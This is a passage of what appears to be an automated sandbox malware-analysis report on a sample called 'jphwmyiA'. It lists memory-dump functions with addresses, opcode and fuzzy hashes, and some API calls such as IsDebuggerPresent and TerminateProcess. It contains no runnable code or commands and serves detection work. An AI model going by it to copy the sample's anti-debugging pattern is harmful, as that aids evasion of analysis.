                                                                                                                                            • Opcode Fuzzy Hash: 0bb227209b7c2fe6f6a38cbc3c35cf715a6bc6ace9d43c17f85e5d78bb97b4e8
                                                                                                                                            • Instruction Fuzzy Hash: 0241E375E01218DFDB04DFA4D994ADEBBF2BB48304F208529D819A7398DB786946CF50
                                                                                                                                            Function 25048A68 Relevance: .1, Instructions: 115COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 842eeb3a16aa71317ca781bafce28cc6d3c909622aeee4de6f7f5282fab8bd85
                                                                                                                                            • Instruction ID: fa3a2edb76830fa477a51b3c109a9fc2ac18d7288fd9a4c2b64475265ecb4c4b
                                                                                                                                            • Opcode Fuzzy Hash: 842eeb3a16aa71317ca781bafce28cc6d3c909622aeee4de6f7f5282fab8bd85
                                                                                                                                            • Instruction Fuzzy Hash: E4417AB4D012589FCB00CFA9D984ADEFBF5BF49310F24906AE518B7220D374A946CF94
                                                                                                                                            Function 25048A70 Relevance: .1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e9a9ece5011e4b2c8b5f02702a13985169e0ff2bd93541fed88363a79cbfde17
                                                                                                                                            • Instruction ID: 764cb8ddcebd2a9f47e8c1b85ed48e04d9d57052ab4b06727b7c790d8495568a
                                                                                                                                            • Opcode Fuzzy Hash: e9a9ece5011e4b2c8b5f02702a13985169e0ff2bd93541fed88363a79cbfde17
                                                                                                                                            • Instruction Fuzzy Hash: 93415BB4D052589FCB00CFA9D984ADEFBF5BF49310F24946AE518B7220D374A946CF94
                                                                                                                                            Function 250FEBA8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 311527605335160e6d356b0dcd83c0da4451c061a5f2bc6a4a1f1c60b1e1f303
                                                                                                                                            • Instruction ID: 43d59121327929a2f3de0f1910e1ce182f756d15159a11921de79d106bb01cad
                                                                                                                                            • Opcode Fuzzy Hash: 311527605335160e6d356b0dcd83c0da4451c061a5f2bc6a4a1f1c60b1e1f303
                                                                                                                                            • Instruction Fuzzy Hash: 8B41F474E01218DFDB04DFA5D994ADEBBF2BF48304F208529D819A7398DB786946CF50
                                                                                                                                            Function 250EE800 Relevance: .1, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74873b908051e25f59a265184d5f961425709853e655eed5aae401cde143a4c8
                                                                                                                                            • Instruction ID: 7baaf0ad2dcb4b2f69f968c7883cc94200ea57b85eee09326ba51f34fddc547d
                                                                                                                                            • Opcode Fuzzy Hash: 74873b908051e25f59a265184d5f961425709853e655eed5aae401cde143a4c8
                                                                                                                                            • Instruction Fuzzy Hash: C831C775E016188FDB18DFAAD8406DEBBF2BF89300F24D42AC418BB254DB35A906CF51
                                                                                                                                            Function 250F6110 Relevance: .1, Instructions: 93COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 864fded015aca029a7272e1d886730a642b59bab46502fba3cc63903e1a53110
                                                                                                                                            • Instruction ID: f2ebd2f937998389c8fb44ebac8c2b18b9f7cb681462dc202c7a9d6967cd11d2
                                                                                                                                            • Opcode Fuzzy Hash: 864fded015aca029a7272e1d886730a642b59bab46502fba3cc63903e1a53110
                                                                                                                                            • Instruction Fuzzy Hash: 6531E675E05618CBDB04CFAAD8406DEBBF2BF89300F14D429C419BB258DB356906CF10
                                                                                                                                            Function 250FC460 Relevance: .1, Instructions: 93COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7189f89c5b43c30bdff4a37acc7b08b576f7eddb21fbb8fb3be3f54050086bce
                                                                                                                                            • Instruction ID: c5566f75f63120ce6755aa824211f0db082d814718eafe299c2f130bf096603a
                                                                                                                                            • Opcode Fuzzy Hash: 7189f89c5b43c30bdff4a37acc7b08b576f7eddb21fbb8fb3be3f54050086bce
                                                                                                                                            • Instruction Fuzzy Hash: 9A31E375E052088BDB08DFAAD9516DEBBF2BF89300F24D429D418BB258DB34A946CF50
                                                                                                                                            Function 250E6EBA Relevance: .1, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 35fd51ea86e096e25137dd4af5101621933a84c7924c8aa41f9ae10eaf5db6a3
                                                                                                                                            • Instruction ID: d0af845df9960421eaca335ef261bb0cee231be1107798f3c45752ddc58c7f9a
                                                                                                                                            • Opcode Fuzzy Hash: 35fd51ea86e096e25137dd4af5101621933a84c7924c8aa41f9ae10eaf5db6a3
                                                                                                                                            • Instruction Fuzzy Hash: 4B31C671E056488FDB14DFAAE940ADDFBF2AF89300F24D429C418BB255DB356946CF50
                                                                                                                                            Function 250E0E8A Relevance: .1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7258c2a809e4d203b4829dc745461633fa7ccca428e468937091e7e3d28737a9
                                                                                                                                            • Instruction ID: 799cd06f0b5c29d54e529ea5b6a2db2db201fb39803af1d3ea31c3be1cba1453
                                                                                                                                            • Opcode Fuzzy Hash: 7258c2a809e4d203b4829dc745461633fa7ccca428e468937091e7e3d28737a9
                                                                                                                                            • Instruction Fuzzy Hash: 9331C670E012488FDB19DFAAD950ADEFBF2AF89300F24D429C418BB258DB356906CF54
                                                                                                                                            Function 1F25D664 Relevance: .1, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756017638.000000001F25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F25D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f25d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 55383bafa85ac61a482ab7aae0a7dd00dda3e897beb695283a81853ea9941aad
                                                                                                                                            • Instruction ID: 0bb46cc81ccfa1afa82f3e1d124a5864d7d05a2e3dde22a3b00608eb9f659787
                                                                                                                                            • Opcode Fuzzy Hash: 55383bafa85ac61a482ab7aae0a7dd00dda3e897beb695283a81853ea9941aad
                                                                                                                                            • Instruction Fuzzy Hash: D52133B1908241DFCB05CF24D9D0F46BF65FB88314F608269E8080A266C33AE857CAA2
                                                                                                                                            Function 1F26D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756239819.000000001F26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F26D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f26d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d89a9502bfdc344ed6004c78a82a762a3e5a93794c510e3255ad19867c618e2
                                                                                                                                            • Instruction ID: 86af3ff61c31ef57ff8340b707c2575011e29fcecc82321333e5f7276b2ea8e9
                                                                                                                                            • Opcode Fuzzy Hash: 8d89a9502bfdc344ed6004c78a82a762a3e5a93794c510e3255ad19867c618e2
                                                                                                                                            • Instruction Fuzzy Hash: E221F571504249DFCB04CF24C9D0B16BB65FB84324F60C6A9DD494F251C77AE8C6CB61
                                                                                                                                            Function 25047700 Relevance: .1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aacb49a28a71c269fe73f6ab6e932d6e5c75816cdb3596804137f47970d3161b
                                                                                                                                            • Instruction ID: 3fa43bf8dcf1cbed09c1a0473d1c96b283edd4e16ef871e2de1d9df953840723
                                                                                                                                            • Opcode Fuzzy Hash: aacb49a28a71c269fe73f6ab6e932d6e5c75816cdb3596804137f47970d3161b
                                                                                                                                            • Instruction Fuzzy Hash: 931108363083985FCB469F7898242AF7FA3AFC9200F10449DD815C7391CE345D068795
                                                                                                                                            Function 1F25D65F Relevance: .1, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756017638.000000001F25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F25D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f25d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                            • Instruction ID: b4236e72ac4fdbc840efadb1d27311dccd1071314e3651ed459d768614def72a
                                                                                                                                            • Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                            • Instruction Fuzzy Hash: 7411B176504281CFCB02CF10D9C4B56BF71FB88314F24C6A9D9494B666C336E45ACBA2
                                                                                                                                            Function 25046E79 Relevance: .1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 58612bf55623b3f89e5b2606b3ad15cc001bf47005fd6e974f5cd6fb570bb308
                                                                                                                                            • Instruction ID: 5e8bad100b9eef02821256de6675477e4895fe0134350b32ef8412cfb8e29b6e
                                                                                                                                            • Opcode Fuzzy Hash: 58612bf55623b3f89e5b2606b3ad15cc001bf47005fd6e974f5cd6fb570bb308
                                                                                                                                            • Instruction Fuzzy Hash: 2111E575E001598BDB14DFE9E850FDEBBB1AF48315F00D465E808AB74AEA30AD418B51
                                                                                                                                            Function 1F26D03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756239819.000000001F26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F26D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f26d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
                                                                                                                                            • Instruction ID: 1577747ba21aec4264f1f368cb241b20ffcc1aca7c6d1ec452f521ae893bd51f
                                                                                                                                            • Opcode Fuzzy Hash: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
                                                                                                                                            • Instruction Fuzzy Hash: 1D118B75504289DFDB02CF10D9D4B15BBA2FB84324F34C6A9DC494B656C33AE48ACB62
                                                                                                                                            Function 250FDC40 Relevance: .0, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c869cd9046c004154b2dfab1c143728e748671f884eeb72346fe7959fadc940
                                                                                                                                            • Instruction ID: 64a2ddef875d6ec562927eb058c9fd5e7111ced4b18f5ad63e8a44db3168be5f
                                                                                                                                            • Opcode Fuzzy Hash: 2c869cd9046c004154b2dfab1c143728e748671f884eeb72346fe7959fadc940
                                                                                                                                            • Instruction Fuzzy Hash: DC018BB6A402118FCB54DB7CD844A4A7BF1BB48255B114269E809D7325EA74ED018B90
                                                                                                                                            Function 1F25D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756017638.000000001F25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F25D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f25d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2f21e4d71eaed5b9fb2801669903e9707b0f086c4baf46647534118353d289fa
                                                                                                                                            • Instruction ID: 49ce642a8403f2bf831ef680249615a4569182e105ac136bc2e2ee3c509e77de
                                                                                                                                            • Opcode Fuzzy Hash: 2f21e4d71eaed5b9fb2801669903e9707b0f086c4baf46647534118353d289fa
                                                                                                                                            • Instruction Fuzzy Hash: FA01F7714083409AD3108A25CD80B97BF98EF46320F24C529ED480E266C279A80BCAB1
                                                                                                                                            Function 1F25D006 Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3756017638.000000001F25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F25D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_1f25d000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1488f55ba02d89ec97f525675c97f496c999f0ae676180a789a753f03d63816f
                                                                                                                                            • Instruction ID: 5a8d15d770120847653ab51e1e36ce2debe7ea05680df7383a76e3f446755fbe
                                                                                                                                            • Opcode Fuzzy Hash: 1488f55ba02d89ec97f525675c97f496c999f0ae676180a789a753f03d63816f
                                                                                                                                            • Instruction Fuzzy Hash: 2D01757140D3C49ED3128B258CA4792BFB4DF53224F18C1DBD9888F2A3C2695849C772
                                                                                                                                            Function 250FDBB8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3e928ec6eba7e8dc3afeb6798864c818ce583a82c706f05a1e617b24e71a1ec2
                                                                                                                                            • Instruction ID: 8f3efea7e241816787e8bc17f4d120c04c13f5a43b51ed4e5dbef71f624cb6bd
                                                                                                                                            • Opcode Fuzzy Hash: 3e928ec6eba7e8dc3afeb6798864c818ce583a82c706f05a1e617b24e71a1ec2
                                                                                                                                            • Instruction Fuzzy Hash: 5D01B671E0421A9FCB48DFB9D94069EBBF5BF48204F10856AD419E7250EB786901CBD1
                                                                                                                                            Function 25047FB8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4fd147846cafc72a192140ddffe13ee71963f543c267bbc753cbb3523781b9d0
                                                                                                                                            • Instruction ID: 7383773e5c717d6463f9140ad0e98982ae6027ae2e61c0221de9b060a2abe7ec
                                                                                                                                            • Opcode Fuzzy Hash: 4fd147846cafc72a192140ddffe13ee71963f543c267bbc753cbb3523781b9d0
                                                                                                                                            • Instruction Fuzzy Hash: 360114B4E04209EFCB44DFA9C840AAEBBF5FB48300F2080BAD818A3350E7755A01DF91
                                                                                                                                            Function 250FD6F0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: af66c714eb2cf8dedee27dd2f0064d307fa8f9194cc661753216034e7a1a0ece
                                                                                                                                            • Instruction ID: 72582cdbe002fd5120a4c9e2a56300037bc4c97ffe6c7760f4539217b826b05f
                                                                                                                                            • Opcode Fuzzy Hash: af66c714eb2cf8dedee27dd2f0064d307fa8f9194cc661753216034e7a1a0ece
                                                                                                                                            • Instruction Fuzzy Hash: 09F082363142108FD715DA39E958E6A3BE7AFC6711B2540BAE406CF2B1DE61EC01CB90
                                                                                                                                            Function 250FD700 Relevance: .0, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: df9d74e23888a21bef6da62898777d57db2aeeca639db22d071a738bf6b98007
                                                                                                                                            • Instruction ID: 8b77d8cb2ba721aaf2d8f059082707b48ae2f622fa4b3460401aa013f7388a19
                                                                                                                                            • Opcode Fuzzy Hash: df9d74e23888a21bef6da62898777d57db2aeeca639db22d071a738bf6b98007
                                                                                                                                            • Instruction Fuzzy Hash: B2F0FE353402108FD718DA2AE95892A37ABFFC661571580B9E506CB261EE65EC018790
                                                                                                                                            Function 250FD6DA Relevance: .0, Instructions: 5COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3cb6095bcf07a007492fe31c139d473064eb2bd12b41b2f3d243c98a06ec37eb
                                                                                                                                            • Instruction ID: b9f8e2bcc854a2b717b1e3416dd4cea92c7912cdd8b93e69867e6cfa5f2690f7
                                                                                                                                            • Opcode Fuzzy Hash: 3cb6095bcf07a007492fe31c139d473064eb2bd12b41b2f3d243c98a06ec37eb
                                                                                                                                            • Instruction Fuzzy Hash: 96B09261498590CFEF00CB20EA899053F61AAA020034885E1A4148A066C3249800CA90

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                            • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                            • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                            Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                            • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                            • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                            • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                            Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                            • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                            • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                            • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                            Function 25B9E28E Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3767535563.0000000025B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 25B90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25b90000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Z !
                                                                                                                                            • API String ID: 0-2476318444
                                                                                                                                            • Opcode ID: 0f9f4dbe1b920ca2eb5da345e0d028fd10c627889d03d2e709d00ccc22cf6a7b
                                                                                                                                            • Instruction ID: e52e66c0f6b4db8102ca92da6f4c00e86b026cd0fa0b9ec4d5074bc1e59c781d
                                                                                                                                            • Opcode Fuzzy Hash: 0f9f4dbe1b920ca2eb5da345e0d028fd10c627889d03d2e709d00ccc22cf6a7b
